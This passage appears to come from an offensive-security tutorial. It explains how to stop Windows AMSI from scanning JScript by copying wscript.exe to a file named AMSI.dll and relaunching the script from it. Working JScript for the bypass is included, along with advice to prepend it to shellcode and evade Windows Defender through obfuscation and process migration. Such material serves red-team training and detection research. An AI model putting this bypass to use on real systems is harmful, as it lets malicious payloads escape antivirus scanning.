## Executable or DLL?
While we cannot locate any of the structures to interact with the Win32 APIs from Jscript, we know that AMSI requires AMSI.DLL. If we could prevent AMSI.DLL from loading or load our own version of it, we could force the AMSI implementation in wscript.exe to produce an error and abort.

The fact is, the AMSI.DLL is loaded by a call to _LoadLibraryExW_ with it's calling function _COleScript::Initialize_.

According to the _LoadLibraryExW_ function prototype, the first argument is the name of the DLL to load.
(in our case "amsi.dll")

We could hijack this by putting our own malicious dll in a writable location, however, _LoadLibraryExW_ can accept additional arguments and the third argument modifies the function's default behavior. In this case, R8 (the third argument) is set to 0x800.
This is equivalent to the enum _LOAD_LIBRARY_SEARCH_SYSTEM32_, which forces the function to search in the C:\\Windows\\System32 directory first.
This prevents a DLL hijacking attack.

However, we have a work around.

If a process named "amsi.dll" tries to load a DLL of the same name, _LoadLibraryExW_ will report that it's already in memory and abort the load to improve efficiency.
Which means any attempts to use the dll will fail, causing AMSI to be disabled.
However, double-clicking or running a file with a __.dll__ extension will fail since DLLs are normally loaded, not executed.

If we instead use the _CreateProcess_ Win32 API, the file extension is ignored and the file header would be parsed to determine if it is a valid executable.

We will use the WScript.Shell object in jscript, to call this API.

Our code will be as follows:
```JavaScript
var filesys= new ActiveXObject("Scripting.FileSystemObject");
var sh = new ActiveXObject('WScript.Shell');
try
{
	if(filesys.FileExists("C:\\Windows\\Tasks\\AMSI.dll")==0)
	{
		throw new Error(1, '');
	}
}
catch(e)
{
	filesys.CopyFile("C:\\Windows\\System32\\wscript.exe", "C:\\Windows\\Tasks\\AMSI.dll");
	sh.Exec("C:\\Windows\\Tasks\\AMSI.dll -e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58} "+WScript.ScriptFullName);
	WScript.Quit(1);
}
```

Even though prepending this to our shellcode, we get a shell, it is immidiately killed by Windows defender, we can work through this, by obfuscating, and immidiately migrating our shell to another process.

